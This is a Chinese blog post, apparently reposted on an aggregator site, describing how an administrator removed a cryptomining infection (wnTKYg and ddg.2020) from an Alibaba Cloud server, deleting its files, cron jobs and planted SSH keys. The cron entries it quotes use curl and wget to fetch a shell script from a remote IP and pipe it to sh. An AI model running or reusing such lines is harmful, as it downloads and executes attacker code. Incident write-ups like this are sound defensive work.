2. 程式人生 > >挖礦程式草草草

挖礦程式草草草

阿新 發佈:2019-02-15

公司有臺做voip的伺服器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去檢視程序,top了下(見下圖)
記一次伺服器被挖礦程式*的解決過程
這個叫wnTKYg的程序很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我的天。這只是一個單核1G記憶體的阿里雲主機)既然被*了,那就得幹掉它,下面是解決過程:

1:第一步要先找到這個wnTKYg檔案實體,對了還有一個叫ddg.2020的程序。

[root@alitest ~]$ find / -name wnTKYg
/tmp/wnTKYg
[root@alitest ~]$ find / -name ddg*
/tmp/ddg
 
.2020

2:接著把這兩個檔案的可執行許可權拿掉。

[root@alitest ~]$ cd /tmp
[root@alitest /tmp]$ chmod -x ddg.2020 wnTKYg

3:殺掉這該死的程序。

[root@alitest /tmp]$ ps -ef | grep -v grep | egrep 'wnTKYg|ddg' | awk '{print $2}' | xargs kill -9

4:清除無用的定時任務。

[root@alitest /tmp]$ crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i
 
.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

這是挖礦程式生成的定時任務,不清除掉待會程序又起來了。

[root@alitest /tmp]$ echo > /var/spool/cron/root

因為這臺機器上沒有做定時任務,所以就直接清除掉了,如果有其他在用的定時任務,不要這樣哦。

5:刪除挖礦程式。

[root@alitest /tmp]$ rm -f ddg.2020 wnTKYg

6:清除.ssh/下的公鑰檔案。

[root@alitest ~/.ssh]$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUGqxNBCvqd+VNZTcSjyV3bs67sqwXSV+XztaY9QN/DDfeXEfWztdaXPbJvmLE34G
.........
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfxLBb/eKbi0TVVULI8ILVtbv2iaGM+eZbZoCWcD3v/eF1B/VkHAC1YwIhfqkUYudwhxV
.................

這臺機器並沒有上傳過公鑰檔案,所以這就是*者留下的咯,刪掉刪掉。

[[email protected] ~/.ssh]$ rm -f authorized_keys

至此,*就已經清理完畢了。

相關推薦

程式草草

公司有臺做voip的伺服器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去檢視程序,top了下(見下圖) 記一次伺服器被挖礦程式*的解決過程 這個叫wnTKYg的程序很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我

zigw 和 nanoWatch, libudev.so 和 XMR 程式查殺記錄 XMR惡意指令碼處理筆記

最近這兩天以來,伺服器一致聲音很響。本來以為有同事在執行大的程式,結果後來發現持續很長時間都是這樣,並沒有停的樣子。後來查了一下,發現有幾個可疑程序導致,幹掉之後,果然伺服器靜悄悄了。 但是,問題並沒有結束,過了一會兒,伺服器又開始轟鳴了,查找了一下,這裡簡單記錄一下。 1.檢視top結果,可見如下情況:

記錄初次跑ETH程式的技術review

p { margin-bottom: 0.1in; line-height: 115% } Mining review 在開始工作之前我對挖礦還處於一個很淺顯的概念: 公式機制Pow工作量,通過計算得到某個數值獲得報酬:報酬是得到的區塊通過轉賬到區塊鏈錢包 獲得。但是實際running程式起來還是一頭

生產Server遭程式入侵,暴力佔用CPU

區塊鏈的火熱,利益驅使必然導致不少PC或Server,被變成肉雞,執行挖礦程式進行挖礦,進而導致我們正常的程式無法正常。 (Centos7 Server)使用top命令檢視伺服器程序執行情況,發現幾個較詭異程序。CPU戰用長期居高不下,系統負載load aver

阿里雲ECS遭程式攻擊解決方法(徹底清除程式,順便下載了程式的指令碼)

一:殺死挖礦程式程序 在伺服器上使用top指令檢視cpu的使用情況,發現有一個叫java的程式佔用cpu高達99.9% PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND

解決阿里雲伺服器提示程式風險

      今天大早上收到阿里雲郵件通知,提示有挖礦程式。一個激靈爬起來,折騰了一早上,終於解決問題了。   其實前兩天就一直收到阿里雲的通知,檢測到對外攻擊,阻斷了對其他伺服器6379、 6380和22埠的訪問,當時沒怎麼當一回兒事,反正是我用來自己學習用的,就放著不管了,結果今天事態就大了。

linux清除隱藏的程式

排查過程: 1、top檢視,找佔CPU高的程序: 通過按照CPU佔比降序檢視,除了少數幾個程序佔CPU,並沒有發現可疑程式 佔用CPU高的挖礦程式應該是隱藏在某個地方了, 2、使用命令ps -aux --sort=-pcpu|head -10查詢,果然找到了這個程式:

Linux伺服器被程式sustse和kworkerds感染後續處理

在上一篇博文Linux系統發現佔用CPU達100%的程序並處理 裡面以為已經把挖礦程式sustse處理乾淨了,可是沒過兩天又收到阿里雲簡訊提醒,說伺服器有問題,難道還有後門嗎?也多虧阿里雲給出提示“出現了可疑安全事件:Linux共享庫檔案預載入配置檔案可疑篡改”。網上查了查相關內容,原來這個

【踩坑】阿里雲ECS清除隱藏的程式

問題描述: 一臺阿里雲伺服器,收到連續告警CPU使用量已經大於95%。但這臺機器上面使用中的業務只有一個不常使用的MySQL,其他就沒有了,正常情況下CPU是不可能達到這麼高的。檢視告警資訊,發現有被植入挖礦程式,可疑程式檔案路徑為 /usr/lib/libiacpkmn.so.3 排查過程

阿里雲提示伺服器有程式 該如何處理

臨近2018年底,我們阿里雲上的一臺ECS伺服器竟然被阿里雲簡訊提示有挖礦程式,多次收到阿里雲的簡訊提醒說什麼伺服器被植入挖礦程式,造成系統資源大量消耗;而且還收到CPU使用率達到百分之90的安全提醒,我們的伺服器上並沒有執行大量的網站,只是一個公司的展示網站,怎麼可能會出現CPU%90以上的告警,

【警惕】大量未修復WebLogic WSAT元件RCE漏洞的主機被程式攻擊

警惕從1月1日開始,大量未修復WebLogic WSAT(全稱:Web Services Ato

記Jenkins攻擊2-門羅幣程式

curl -OL https://github.com/xmrig/xmrig/releases/download/v2.8.3/xmrig-2.8.3-xenial-amd64.tar.gz;      tar xvzf xmrig-2.8.3-xenial-amd64.t

記一次伺服器被程式佔用的解決過程

公司有臺做voip的伺服器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去檢視程序,top了下(見下圖) 這個叫wnTKYg的程序很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我的天。這只是一個單核1G記憶體的阿里雲主機)既然被**

阿里雲遇到imWBR1程式的入侵

在買了阿里雲伺服器,配置了Redis後沒幾天,阿里雲就提醒我說有疑似挖礦的程式在伺服器上,這讓運維小白的我很吃驚,而且自己也沒做過伺服器運維的事,在網上百度了很多,也翻牆google了很多後發現了一篇關於殺死挖礦程序的部落格,轉載給大家看看,http://blog.sina

攻擊者通過 Windows 自帶工具載入程式的檢測分析

譯文宣告 譯文僅供參考,具體內容表達以及含義原文為準 前言 我在職業生涯早期學到的一個教訓是,技術專業人員通常會繼承老問題。對於負責網路服務和安全的管理員來說尤其如此,因為他們繼承了最大的問題:企業 網路。隨著網路的老化,網路往往變得更加難以安全和維護,而管理員

遭遇程式續集_詳解黑客攻擊步驟

下載連結: http://download.csdn.net/download/landehutu/10218235 背景:前幾天寫了一下遭遇挖礦程式後的處理步驟,當時弄了一個活體下來,但是沒有說明那幾個程式的細節,今天補上。 程式細節說明: 黑客先找到系統的漏洞,獲

阿里雲伺服器被程式minerd入侵的終極解決辦法

歡迎掃碼加入Java高知群交流       突然發現阿里雲伺服器CPU很高,幾乎達到100%,執行 top c 一看,嚇一跳,結果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm

程式入侵解決方案

本人自己購買了一臺阿里雲伺服器來玩,晚上收到被挖礦機程式入侵,處理過程大概是這樣的使用top命令檢視看那些程序是陌生的並且佔用大量cpu,因為是挖礦機肯定會佔用很多cpu,先不要著急kill掉,因為一般都會重啟啟動的,我用history(也可以檢視~/.bash_histor

曲速未來 :解析Kodi安裝的外掛遭惡意程式活動

    概述   Kodi是一個免費的開放原始碼媒體播放器軟體應用程式。由於其開源和跨平臺特性,且以C ++編寫的核心程式碼而被廣泛應用。該軟體最近因侵權問題關閉了第三方附加元件XvBMC,而在這個元件被關閉之後,有研究人員發現這個第三方擴充套件庫

程式設計師利用公司伺服器被舉報,網友:和刪庫的哥們有的一比

進入2017年,以比特幣、以太坊為首的數字貨幣是徹徹底底地火了。原因無他,就是幣價暴漲。  在這樣的一個大背景下,一個叫做“礦工”的群體也逐漸走入了我們的視線。作為數字貨幣的挖掘者,“礦工”到底是怎樣的一個群體呢?近日就有一位程式設計師因為利用公司伺服器挖礦,而被舉報了。